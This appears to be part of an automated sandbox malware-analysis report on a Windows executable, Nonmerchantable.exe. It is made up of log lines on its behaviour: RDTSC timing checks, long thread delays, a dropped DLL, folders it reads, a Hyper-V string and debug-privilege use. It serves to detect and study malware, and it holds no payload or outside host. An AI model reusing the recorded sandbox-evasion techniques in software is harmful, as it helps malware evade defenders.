            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\Nonmerchantable.exeAPI/Special instruction interceptor: Address: 599E473
            Source: C:\Users\user\Desktop\Nonmerchantable.exeAPI/Special instruction interceptor: Address: 481E473
            Source: C:\Users\user\Desktop\Nonmerchantable.exeRDTSC instruction interceptor: First address: 5974ADE second address: 5974ADE instructions: 0x00000000 rdtsc 0x00000002 test ch, ch 0x00000004 cmp ebx, ecx 0x00000006 jc 00007F136CB7D253h 0x00000008 test di, 2992h 0x0000000d inc ebp 0x0000000e inc ebx 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\Nonmerchantable.exeRDTSC instruction interceptor: First address: 47F4ADE second address: 47F4ADE instructions: 0x00000000 rdtsc 0x00000002 test ch, ch 0x00000004 cmp ebx, ecx 0x00000006 jc 00007F136CECDCE3h 0x00000008 test di, 2992h 0x0000000d inc ebp 0x0000000e inc ebx 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\Nonmerchantable.exeMemory allocated: 5800000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeMemory allocated: 36160000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeMemory allocated: 35FA0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeThread delayed: delay time: 599891Jump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeThread delayed: delay time: 599781Jump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeThread delayed: delay time: 599672Jump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeThread delayed: delay time: 599559Jump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeThread delayed: delay time: 599438Jump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeThread delayed: delay time: 599313Jump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeThread delayed: delay time: 599201Jump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeThread delayed: delay time: 599094Jump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeThread delayed: delay time: 598969Jump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeThread delayed: delay time: 598860Jump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeThread delayed: delay time: 598735Jump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeThread delayed: delay time: 598610Jump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeThread delayed: delay time: 598485Jump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeThread delayed: delay time: 598360Jump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeThread delayed: delay time: 598247Jump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeThread delayed: delay time: 598125Jump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeThread delayed: delay time: 598016Jump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeThread delayed: delay time: 597891Jump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeThread delayed: delay time: 597781Jump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeThread delayed: delay time: 597672Jump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeThread delayed: delay time: 597563Jump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeThread delayed: delay time: 597438Jump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeThread delayed: delay time: 597313Jump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeThread delayed: delay time: 597204Jump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeThread delayed: delay time: 597079Jump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeThread delayed: delay time: 596954Jump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeThread delayed: delay time: 596829Jump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeThread delayed: delay time: 596704Jump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeThread delayed: delay time: 596579Jump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeThread delayed: delay time: 596454Jump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeThread delayed: delay time: 596297Jump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeThread delayed: delay time: 596187Jump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeThread delayed: delay time: 596078Jump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeThread delayed: delay time: 595969Jump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeThread delayed: delay time: 595844Jump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeThread delayed: delay time: 595734Jump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeThread delayed: delay time: 595625Jump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeThread delayed: delay time: 595516Jump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeThread delayed: delay time: 595406Jump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeThread delayed: delay time: 595297Jump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeThread delayed: delay time: 595188Jump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeThread delayed: delay time: 595063Jump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeThread delayed: delay time: 594938Jump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeThread delayed: delay time: 594828Jump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeThread delayed: delay time: 594719Jump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeThread delayed: delay time: 594594Jump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeThread delayed: delay time: 594485Jump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeThread delayed: delay time: 594360Jump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeThread delayed: delay time: 594248Jump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeWindow / User API: threadDelayed 1486Jump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeWindow / User API: threadDelayed 8352Jump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsmABCD.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\Nonmerchantable.exeAPI coverage: 1.9 %
            Source: C:\Users\user\Desktop\Nonmerchantable.exe TID: 3396Thread sleep time: -25825441703193356s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exe TID: 3396Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exe TID: 3396Thread sleep time: -599891s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exe TID: 3084Thread sleep count: 1486 > 30Jump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exe TID: 3084Thread sleep count: 8352 > 30Jump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exe TID: 3396Thread sleep time: -599781s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exe TID: 3396Thread sleep time: -599672s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exe TID: 3396Thread sleep time: -599559s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exe TID: 3396Thread sleep time: -599438s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exe TID: 3396Thread sleep time: -599313s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exe TID: 3396Thread sleep time: -599201s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exe TID: 3396Thread sleep time: -599094s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exe TID: 3396Thread sleep time: -598969s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exe TID: 3396Thread sleep time: -598860s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exe TID: 3396Thread sleep time: -598735s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exe TID: 3396Thread sleep time: -598610s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exe TID: 3396Thread sleep time: -598485s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exe TID: 3396Thread sleep time: -598360s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exe TID: 3396Thread sleep time: -598247s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exe TID: 3396Thread sleep time: -598125s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exe TID: 3396Thread sleep time: -598016s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exe TID: 3396Thread sleep time: -597891s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exe TID: 3396Thread sleep time: -597781s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exe TID: 3396Thread sleep time: -597672s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exe TID: 3396Thread sleep time: -597563s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exe TID: 3396Thread sleep time: -597438s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exe TID: 3396Thread sleep time: -597313s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exe TID: 3396Thread sleep time: -597204s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exe TID: 3396Thread sleep time: -597079s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exe TID: 3396Thread sleep time: -596954s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exe TID: 3396Thread sleep time: -596829s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exe TID: 3396Thread sleep time: -596704s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exe TID: 3396Thread sleep time: -596579s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exe TID: 3396Thread sleep time: -596454s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exe TID: 3396Thread sleep time: -596297s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exe TID: 3396Thread sleep time: -596187s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exe TID: 3396Thread sleep time: -596078s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exe TID: 3396Thread sleep time: -595969s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exe TID: 3396Thread sleep time: -595844s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exe TID: 3396Thread sleep time: -595734s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exe TID: 3396Thread sleep time: -595625s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exe TID: 3396Thread sleep time: -595516s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exe TID: 3396Thread sleep time: -595406s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exe TID: 3396Thread sleep time: -595297s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exe TID: 3396Thread sleep time: -595188s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exe TID: 3396Thread sleep time: -595063s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exe TID: 3396Thread sleep time: -594938s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exe TID: 3396Thread sleep time: -594828s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exe TID: 3396Thread sleep time: -594719s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exe TID: 3396Thread sleep time: -594594s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exe TID: 3396Thread sleep time: -594485s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exe TID: 3396Thread sleep time: -594360s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exe TID: 3396Thread sleep time: -594248s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 0_2_0040646B FindFirstFileA,FindClose,0_2_0040646B
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 0_2_004027A1 FindFirstFileA,0_2_004027A1
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 0_2_004058BF GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,LdrInitializeThunk,FindNextFileA,FindClose,0_2_004058BF
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 5_2_0040646B FindFirstFileA,FindClose,5_2_0040646B
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 5_2_004027A1 FindFirstFileA,5_2_004027A1
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 5_2_004058BF GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,LdrInitializeThunk,FindNextFileA,FindClose,5_2_004058BF
            Source: C:\Users\user\Desktop\Nonmerchantable.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeThread delayed: delay time: 599891Jump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeThread delayed: delay time: 599781Jump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeThread delayed: delay time: 599672Jump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeThread delayed: delay time: 599559Jump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeThread delayed: delay time: 599438Jump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeThread delayed: delay time: 599313Jump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeThread delayed: delay time: 599201Jump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeThread delayed: delay time: 599094Jump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeThread delayed: delay time: 598969Jump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeThread delayed: delay time: 598860Jump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeThread delayed: delay time: 598735Jump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeThread delayed: delay time: 598610Jump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeThread delayed: delay time: 598485Jump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeThread delayed: delay time: 598360Jump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeThread delayed: delay time: 598247Jump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeThread delayed: delay time: 598125Jump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeThread delayed: delay time: 598016Jump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeThread delayed: delay time: 597891Jump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeThread delayed: delay time: 597781Jump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeThread delayed: delay time: 597672Jump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeThread delayed: delay time: 597563Jump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeThread delayed: delay time: 597438Jump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeThread delayed: delay time: 597313Jump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeThread delayed: delay time: 597204Jump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeThread delayed: delay time: 597079Jump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeThread delayed: delay time: 596954Jump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeThread delayed: delay time: 596829Jump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeThread delayed: delay time: 596704Jump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeThread delayed: delay time: 596579Jump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeThread delayed: delay time: 596454Jump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeThread delayed: delay time: 596297Jump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeThread delayed: delay time: 596187Jump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeThread delayed: delay time: 596078Jump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeThread delayed: delay time: 595969Jump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeThread delayed: delay time: 595844Jump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeThread delayed: delay time: 595734Jump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeThread delayed: delay time: 595625Jump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeThread delayed: delay time: 595516Jump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeThread delayed: delay time: 595406Jump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeThread delayed: delay time: 595297Jump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeThread delayed: delay time: 595188Jump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeThread delayed: delay time: 595063Jump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeThread delayed: delay time: 594938Jump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeThread delayed: delay time: 594828Jump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeThread delayed: delay time: 594719Jump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeThread delayed: delay time: 594594Jump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeThread delayed: delay time: 594485Jump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeThread delayed: delay time: 594360Jump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeThread delayed: delay time: 594248Jump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeFile opened: C:\Users\userJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCacheJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeFile opened: C:\Users\user\AppDataJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeFile opened: C:\Users\user\AppData\Local\Microsoft\WindowsJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeFile opened: C:\Users\user\AppData\Local\MicrosoftJump to behavior
            Source: Nonmerchantable.exe, 00000005.00000002.4179767615.00000000058EC000.00000004.00000020.00020000.00000000.sdmp, Nonmerchantable.exe, 00000005.00000002.4179767615.0000000005898000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: C:\Users\user\Desktop\Nonmerchantable.exeAPI call chain: ExitProcess graph end nodegraph_0-4021
            Source: C:\Users\user\Desktop\Nonmerchantable.exeAPI call chain: ExitProcess graph end nodegraph_0-4190
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,LdrInitializeThunk,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess,0_2_00403348
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 0_2_6F951A98 LdrInitializeThunk,GlobalAlloc,LdrInitializeThunk,LdrInitializeThunk,lstrcpyA,lstrcpyA,GlobalFree,LdrInitializeThunk,GlobalFree,GlobalFree,GlobalFree,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,lstrcpyA,LdrInitializeThunk,LdrInitializeThunk,GetModuleHandleA,LdrInitializeThunk,LoadLibraryA,GetProcAddress,lstrlenA,0_2_6F951A98
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeMemory allocated: page read and write | page guardJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeProcess created: C:\Users\user\Desktop\Nonmerchantable.exe "C:\Users\user\Desktop\Nonmerchantable.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeQueries volume information: C:\Users\user\Desktop\Nonmerchantable.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Nonmerchantable.exeCode function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,LdrInitializeThunk,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess,0_2_00403348
